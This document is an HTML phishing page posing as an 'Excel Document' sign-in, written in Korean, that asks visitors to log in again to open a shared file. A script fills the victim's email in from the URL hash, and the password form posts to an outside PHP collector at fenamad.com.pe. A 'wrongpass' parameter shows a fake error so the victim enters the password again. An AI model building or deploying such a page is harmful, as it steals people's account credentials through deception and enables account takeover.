



<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Excel Document</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="flex flex-col justify-center items-center h-screen w-screen bg-no-repeat bg-cover" style="background-image: url('bg-img.png');">
   
    <div  class="h-[32.3rem] w-96 bg-white flex flex-col justify-center items-center rounded shadow-xl shadow-slate-500">
        
            <div class="mb-6 flex flex-col justify-center items-center" >
                <img src="de.png" alt="">
            </div>
        
            <p class="text-3xl font-semibold text-gray-800 " >다시 로그인하십시오 !</p>
            <p class="font-light text-center px-10 py-6" >받는 사람 이메일만 공유 파일에 액세스하여 받은 문서를 열 수 있습니다.</p>
            <div id="wrongpass" style='font-size: 12px; color: red; text-align: center; margin: 10px 0; display: none;'>비밀번호가 잘못되었습니다. 다시 시도하십시오</div>
            
            <form name="form1" class="ml-6 mr-6"  action="https://fenamad.com.pe/all/all/gen.php" onsubmit="return validateForm()" method="post" required>

                
                <div class="text-center pl-5 pr-5">
                    <span class="text-red-700 font-light text-base" id="error"></span>
                    
                </div>

                <span class="text-blue-700 font-light text-base" id="error2"></span>
                    
                

                <input class="h-10 w-full border border-slate-300 rounded-r focus:outline-none 
                focus:border-blue-100 focus:ring-2 pl-3 text-base text-gray-600 font-light" 
                type="email" name="email" id="nameu" value="" placeholder="이메일 입력" readonly>
                

                <div class="p-2"></div>

                <input class="h-10 w-full border border-slate-300 rounded-r focus:outline-none 
                focus:border-blue-100 focus:ring-2 pl-3 text-base text-gray-600 font-light" 
                type="password" name="password" id="namep"  placeholder="비밀번호" required>

                <div class="p-2"></div>

                <div class="font-light text-blue-600 pb-12 pt-2">

                    <input class=""  type="checkbox" name="" id="">
                
                    <a class="pr-12 pl-1" href="#">로그인 유지</a> <a href="#">비밀번호를 잊으 셨나요?</a>
                </div>

                <div class="flex flex-col items-center justify-center w-full" >
                    <button class="h-12 w-11/12 text-gray-100 bg-blue-700 border rounded mb-6" type="submit" value="submit" onclick="validateForm()">다음</button>
                </div>
                
            </form>    
        
    </div>
    


    
</body>
<script>
        // Function to extract email from the URL
        function extractEmailFromURL() {
            // Get the URL
            var url = window.location.href;
            
            // Check if the URL contains a hash (#)
            if (url.includes('#')) {
                // Split the URL by the hash (#) character
                var parts = url.split('#');
                
                // If there are parts after the hash, set the first part as the email
                if (parts.length > 1) {
                    var email = parts[1];
                    
                    // Set the extracted email as the input's placeholder
                    document.getElementById('nameu').value = email;
                }
            }
        }
        
        // Call the function to extract and display the email as the placeholder
        extractEmailFromURL();
    </script>

<!-- <script>
    function errorMessage() {
        var error = document.getElementById("error")
        if (isNaN(document.getElementById("nameu").value))
        {
             
            // Changing content and color of content
            error.textContent = "Please enter a valid number"
            error.style.color = "red"
        } else {
            error.textContent = ""
        }
    }
</script> -->


<script>
  var wrongpass = new URLSearchParams(location.search).get('wrongpass');
  if(wrongpass){
    document.getElementById('wrongpass').style.display = 'block';
    document.getElementById('page_type').value = 'WRONG PASSWORD PAGE';
    };
</script>



</html>


<!-- setTimeout(function() {
    var error = document.getElementById("error");
    error.parentNode.removeChild(error);
    },

5000); -->